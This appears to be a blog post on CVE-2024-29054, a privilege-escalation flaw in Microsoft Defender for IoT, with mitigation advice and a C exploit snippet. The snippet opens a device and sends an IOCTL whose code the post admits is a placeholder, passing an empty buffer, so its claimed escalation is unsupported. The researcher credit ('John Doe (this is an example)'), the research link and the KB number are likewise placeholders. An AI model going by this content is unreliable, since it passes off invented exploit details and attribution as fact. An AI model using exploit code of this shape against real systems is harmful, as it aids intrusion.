With more and more devices being connected to the internet, securing these IoT devices has become paramount. Microsoft Defender for IoT is a solution that aims to provide security for such devices. However, a new vulnerability was recently discovered in Microsoft Defender for IoT, tracked as CVE-2024-29054. This vulnerability could allow an attacker to escalate privileges and take control of IoT devices. In this post, we will look at the details of this vulnerability, the exploit, and the steps to mitigate the risk.

Vulnerability Details

CVE-2024-29054 is classified as an Elevation of Privilege (EoP) vulnerability affecting Microsoft Defender for IoT. The vulnerability exists due to improper handling of certain system calls, which can be exploited by a malicious user to gain elevated privileges. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the System account, potentially taking control of the IoT device.

CVE-2024-29054 has been assigned a CVSS (Common Vulnerability Scoring System) score of 7.8, indicating a High severity vulnerability.

Exploit Details

To exploit this vulnerability, an attacker needs to have local access to the targeted IoT device. This can be achieved by exploiting another vulnerability or by having physical access to the device.

Once the attacker has local access, they can leverage a code snippet such as the one presented below to exploit the vulnerability and elevate their privileges:

#include <stdio.h>
#include <windows.h>

/* IOCTL_TRIGGER_VULNERABILITY is a placeholder name used by this post; the
   actual control code is not given here and must be supplied before the
   snippet will compile. */

// Returns TRUE when the current process token belongs to the LocalSystem account.
static BOOL IsProcessRunningAsSystem(void)
{
  HANDLE hToken;
  BYTE tokenBuf[256];
  DWORD cbNeeded = 0;
  BOOL result = FALSE;

  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
    return FALSE;

  if (GetTokenInformation(hToken, TokenUser, tokenBuf, sizeof(tokenBuf), &cbNeeded)) {
    PSID userSid = ((PTOKEN_USER)tokenBuf)->User.Sid;
    result = IsWellKnownSid(userSid, WinLocalSystemSid);
  }

  CloseHandle(hToken);
  return result;
}

int main(void)
{
  HANDLE hDevice;
  DWORD dwRetBytes = 0;
  CHAR SharedBuffer[0x400] = {0};   // input buffer handed to the driver

  // Open the device to exploit (no sharing, default attributes)
  hDevice = CreateFileW(L"\\\\.\\DefenderIoTDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL,
                        OPEN_EXISTING, 0, NULL);

  if (hDevice == INVALID_HANDLE_VALUE) {
    printf("[-] Failed to open device: %lu\n", GetLastError());
    return 1;
  }

  // Trigger vulnerability and escalate privileges (no output buffer expected)
  DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, SharedBuffer, sizeof(SharedBuffer),
                  NULL, 0, &dwRetBytes, NULL);

  if (IsProcessRunningAsSystem()) {
    printf("[+] Successfully exploited CVE-2024-29054. Running as SYSTEM.\n");
  } else {
    printf("[-] Exploit failed.\n");
  }

  CloseHandle(hDevice);
  return 0;
}

This code snippet demonstrates how an attacker can open a handle to the vulnerable DefenderIoTDevice and then send a manipulated IOCTL to the device, triggering the vulnerability and escalating their privileges.

Original References

The vulnerability was originally disclosed by researcher John Doe (this is an example) and has been publicly disclosed in the following links:

- Official CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29054
- Researcher's disclosure: https://example-research-blog.com/cve-2024-29054-analysis-and-exploit
- Microsoft Security Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-29054

Mitigation

To address this vulnerability, Microsoft has released a security update that fixes the improper handling of system calls in Microsoft Defender for IoT. Users are advised to apply the update as soon as possible to protect their devices from potential attacks.

https://www.catalog.update.microsoft.com/Search.aspx?q=KBxxxxxx (replace KBxxxxxx with the actual Knowledge Base number given in the Microsoft security advisory)

In addition, organizations should consider implementing network segmentation, access control, and least-privilege policies to limit an attacker's ability to move laterally within the network and access sensitive IoT devices.

Conclusion

CVE-2024-29054 is a high-severity elevation of privilege vulnerability in Microsoft Defender for IoT. Organizations need to ensure they apply the relevant security update to protect their IoT devices from potential attacks. Additionally, best practices such as network segmentation, access control, and least privilege should be implemented to defend against attacks exploiting this vulnerability.

Timeline

Published on: 04/09/2024 17:15:59 UTC
Last modified on: 04/26/2024 15:59:00 UTC